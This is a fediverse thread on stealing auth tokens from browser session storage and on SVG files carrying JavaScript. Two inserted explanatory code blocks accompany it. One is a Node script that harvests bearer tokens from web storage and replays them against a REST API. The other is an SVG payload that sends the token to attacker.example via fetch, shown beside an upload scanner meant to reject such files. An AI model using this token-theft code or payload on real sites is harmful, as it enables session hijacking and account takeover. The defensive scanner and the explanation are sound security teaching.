Conversation
Notices
kaia (kaia@brotka.st)'s status on Friday, 31-Jan-2025 22:57:33 JST
friend showed me how to steal the auth token from the browser session storage, so I can use it against the REST API. interesting how one can just do that. a browser plugin could steal your session and it wouldn't even be visible to the user?
nyanide :nyancat_rainbow::nyancat_body::nyancat_face: likes this.

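What the post above describes, as an added example (not code from this thread, from the poster's friend, or from any fediverse software): a script running in the app's origin, whether page JavaScript, an extension content script, or anything else that gets to execute there, enumerates sessionStorage, picks out the values shaped like bearer tokens, and replays one against the REST API. The FakeStorage class, the sample entries, the authToken key name, SAMPLE_JWT, the example.test API base and the verify_credentials path are all constructed assumptions; in a browser you would pass window.sessionStorage (or localStorage) and globalThis.fetch instead of the stand-ins.

```javascript
// Added example, not code from the thread or from any fediverse software.
// Everything a script in the app's origin needs to take a token out of
// sessionStorage and use it against the REST API. Runs under Node with an
// in-memory stand-in for DOM Storage; in a browser, pass window.sessionStorage
// (or localStorage) and globalThis.fetch instead.

// Minimal stand-in for the DOM Storage interface: length, key(i), getItem(k).
class FakeStorage {
  constructor(entries) { this.entries = entries; }
  get length() { return this.entries.length; }
  key(i) { return i < this.entries.length ? this.entries[i][0] : null; }
  getItem(k) { const hit = this.entries.find(([key]) => key === k); return hit ? hit[1] : null; }
}

const b64url = (s) => Buffer.from(s).toString('base64url');

// Constructed sample token: JWT-shaped, with a bogus signature. Not a real credential.
const SAMPLE_JWT = [
  b64url(JSON.stringify({ alg: 'HS256', typ: 'JWT' })),
  b64url(JSON.stringify({ sub: 'kaia', exp: 4102444800, scope: 'read write' })),
  b64url('not-a-real-signature'),
].join('.');

// Constructed contents of a single-page app's sessionStorage; 'authToken' is an assumed key name.
const sampleSessionStorage = new FakeStorage([
  ['theme', 'dark'],
  ['lastView', '/timeline'],
  ['authToken', SAMPLE_JWT],
  ['csrf', 'a1b2c3'],
]);

// Everything in web storage is readable by any script on the origin; nothing is hidden.
function dumpStorage(storage) {
  const out = {};
  for (let i = 0; i < storage.length; i++) {
    const k = storage.key(i);
    out[k] = storage.getItem(k);
  }
  return out;
}

const JWT_RE = /^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$/;
const TOKEN_KEY_RE = /token|auth|session|bearer|jwt/i;

// Read JWT claims without verifying the signature: the thief only needs the
// string and its expiry, not a signature check.
function decodeJwtPayload(token) {
  const parts = token.split('.');
  if (parts.length !== 3) return null;
  try {
    return JSON.parse(Buffer.from(parts[1], 'base64url').toString('utf8'));
  } catch {
    return null;
  }
}

// Candidates worth replaying: JWT-shaped values, or any value under a key that
// looks like a credential. Expired JWTs are dropped; the API would reject them anyway.
function findBearerTokens(storage, nowSeconds = Math.floor(Date.now() / 1000)) {
  const found = [];
  for (const [key, value] of Object.entries(dumpStorage(storage))) {
    if (typeof value !== 'string') continue;
    const jwtShaped = JWT_RE.test(value);
    if (!jwtShaped && !TOKEN_KEY_RE.test(key)) continue;
    const claims = jwtShaped ? decodeJwtPayload(value) : null;
    if (claims && typeof claims.exp === 'number' && claims.exp < nowSeconds) continue;
    found.push({ key, token: value, claims });
  }
  return found;
}

// The request the stolen token gets attached to; the same header works from curl.
function buildApiRequest(apiBase, path, token) {
  return {
    url: new URL(path, apiBase).toString(),
    headers: { Authorization: `Bearer ${token}`, Accept: 'application/json' },
  };
}

// fetch is injected so the example runs offline; pass globalThis.fetch for a real target.
async function replayToken(apiBase, path, token, fetchImpl) {
  const req = buildApiRequest(apiBase, path, token);
  const res = await fetchImpl(req.url, { headers: req.headers });
  return { status: res.status, body: await res.json() };
}

// Constructed stand-in for the REST API: accepts exactly the sample token.
async function fakeApi(url, init) {
  const ok = init.headers.Authorization === `Bearer ${SAMPLE_JWT}`;
  return { status: ok ? 200 : 401, json: async () => (ok ? { acct: 'kaia', url } : { error: 'unauthorized' }) };
}

const stolen = findBearerTokens(sampleSessionStorage);
console.log('candidate keys:', stolen.map((t) => t.key));
replayToken('https://example.test', '/api/v1/accounts/verify_credentials', stolen[0].token, fakeApi)
  .then((r) => console.log(r.status, r.body));
```

A content script granted a matching host permission runs in the page's origin, so window.sessionStorage and localStorage are as readable to it as to the page, and nothing in the UI indicates it happened. An HttpOnly cookie is not exposed to script this way, which is the usual argument for keeping the session credential out of web storage; a script on the origin can still make credentialed requests with that cookie attached, so the cookie narrows the damage rather than removing it.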
Slow Rodriguez (rocc@misskey.bubbletea.dev)'s status on Friday, 31-Jan-2025 23:07:13 JST
@kaia@brotka.st real thing
kaia likes this.

snacks (snacks@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:08:08 JST
@kaia that's how the svg exploit for pleroma and akkoma worked
kaia likes this.

nyanide :nyancat_rainbow::nyancat_body::nyancat_face: (nyanide@lab.nyanide.com)'s status on Friday, 31-Jan-2025 23:09:58 JST
@kaia yeah, the plugin is arbitrary code no?
kaia likes this.

nyanide :nyancat_rainbow::nyancat_body::nyancat_face: (nyanide@lab.nyanide.com)'s status on Friday, 31-Jan-2025 23:10:13 JST
@snacks @kaia it used a browser plugin for leverage?
snacks likes this.

snacks (snacks@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:12:51 JST
@nyanide @kaia no, svg can contain js

Nicro (nicro@fedi.absturztau.be)'s status on Friday, 31-Jan-2025 23:14:38 JST
@kaia I wanted to get the user-data from one of my extensions in chromium, because it didn't have a backup-function. Dev-tools didn't have access to extension data at that time, so I installed an unrelated, third-party extension, that added that feature to the dev-tools console. :floofWoozy:
kaia likes this.

ames (amelia@misskey.bubbletea.dev)'s status on Friday, 31-Jan-2025 23:14:42 JST
@kaia@brotka.st yep and this is why malicious extensions and extension supply chain security are so important
there's been a lot of effort to lock down browsers but a mildly privileged extension can blow right through 80% of that
kaia likes this.

kirby (kirby@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:15:07 JST
@snacks @nyanide @kaia and the browser just.. executes them? that doesn't sound realistic. svg is an image format that's used fucking everywhere, you gotta sauce for that senator?
kaia likes this.

snacks (snacks@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:31:27 JST
@kirby @kaia @nyanide mdn links to this instead of elaborating themselves lol https://web.archive.org/web/20100223210744/http://wiki.svg.org/Inter-Document_Communication

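The "svg can contain js" point in the two snacks posts above, as an added example that is not code from this thread, from Pleroma or Akkoma, or from the linked wiki page: a constructed SVG carrying script in the several places the format allows, next to a scanner an upload handler could run to refuse such files. The attacker.example host, the authToken key, the sample files and the accept/reject policy are assumptions. The caveat a practitioner wants is the rendering context: a browser does not run script when an SVG is displayed through an img element or a CSS background, but it does when the file is opened as a document (direct navigation, iframe, object, embed), and a document served from the app's own origin sees the app's web storage and cookies. Same-origin hosting of user uploads is the part that turns "SVG can contain JS" into a session theft.

```javascript
// Added example, not code from the thread or from any fediverse project.
// 1) a constructed SVG showing where script can hide in the format;
// 2) a scanner an upload handler could run before accepting an SVG.
// Limitation: the scanner is regex based and does not handle CDATA,
// comments or attribute values containing '>'; it is a gate, not a sanitizer.

// Constructed malicious sample. The attacker.example host and the authToken
// key are assumptions. It only fires when the SVG is opened as a document on
// the app's origin, not when the app displays it through an img element.
const MALICIOUS_SVG = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1" height="1">
  <script>
    fetch("https://attacker.example/c?t=" + encodeURIComponent(sessionStorage.getItem("authToken")));
  </script>
  <rect width="1" height="1" onload="fetch('https://attacker.example/c?t=' + localStorage.getItem('authToken'))"/>
  <a xlink:href="&#106;avascript:alert(document.domain)"><text y="10">x</text></a>
  <set attributeName="xlink:href" to="javascript:alert(1)"/>
  <image href="https://attacker.example/pixel.png" width="1" height="1"/>
</svg>`;

// Constructed benign sample: plain shapes and text, nothing active.
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#fb0"/><text x="2" y="7">ok</text>
</svg>`;

// Resolve numeric and the basic named XML entities so "&#106;avascript:" is seen as "javascript:".
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&(lt|gt|amp|quot|apos);/g, (_, n) => named[n]);
}

// Walk every start tag and its attributes, recording anything that can run
// script, pull HTML into the image, or reach out to another host.
function scanSvg(svgText) {
  const findings = [];
  if (/<!(DOCTYPE|ENTITY)\b/i.test(svgText)) {
    findings.push({ kind: 'entity-declaration', element: '!DOCTYPE' });
  }
  const TAG_RE = /<\s*([A-Za-z][\w:.-]*)([^>]*)>/g;
  const ATTR_RE = /([^\s=\/"'<>]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let tag;
  while ((tag = TAG_RE.exec(svgText)) !== null) {
    const element = tag[1].toLowerCase().replace(/^.*:/, ''); // drop any namespace prefix
    if (element === 'script') findings.push({ kind: 'script-element', element });
    if (element === 'foreignobject') findings.push({ kind: 'foreign-object', element });
    let a;
    while ((a = ATTR_RE.exec(tag[2])) !== null) {
      const name = a[1].toLowerCase();
      const value = decodeEntities(a[2] ?? a[3] ?? a[4] ?? '');
      // Browsers ignore tabs/newlines inside a URL scheme, so strip them before matching.
      const v = value.replace(/[\s\u0000-\u001f]/g, '').toLowerCase();
      if (/^on[a-z]+$/.test(name)) findings.push({ kind: 'event-handler', element, attr: name });
      if (/^(javascript:|vbscript:|data:text\/html)/.test(v)) findings.push({ kind: 'script-url', element, attr: name });
      if (/^(xlink:)?href$|^src$/.test(name) && /^(https?:)?\/\//.test(v)) {
        findings.push({ kind: 'external-reference', element, attr: name, value });
      }
      // set/animate can rewrite an href to javascript: after the document loads.
      if ((element === 'set' || element === 'animate') && name === 'attributename' && /href$/.test(v)) {
        findings.push({ kind: 'animated-href', element });
      }
    }
  }
  return findings;
}

// Upload policy: anything that can execute or embed HTML is rejected outright;
// an external reference alone is reported but allowed (tracking, not code execution).
function classifySvgUpload(svgText) {
  const findings = scanSvg(svgText);
  const executable = findings.filter((f) => f.kind !== 'external-reference');
  return { findings, decision: executable.length ? 'reject' : 'accept' };
}

console.log(classifySvgUpload(MALICIOUS_SVG));
console.log(classifySvgUpload(BENIGN_SVG).decision);
```

The scanner is a gate, not a sanitizer: a production handler should parse the file with a real XML parser or run it through a sanitizer with an SVG profile, and the safer fix is structural, serving user media from a separate origin and with a Content-Security-Policy that forbids script, so that even an SVG that slips past the check runs with nothing worth stealing.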
Surströmming (selfhost arc) (xian@ak.kazuma.family)'s status on Saturday, 01-Feb-2025 02:53:52 JST
@kaia the dumb dolphin viruses for word sure have evolved huh
kaia likes this.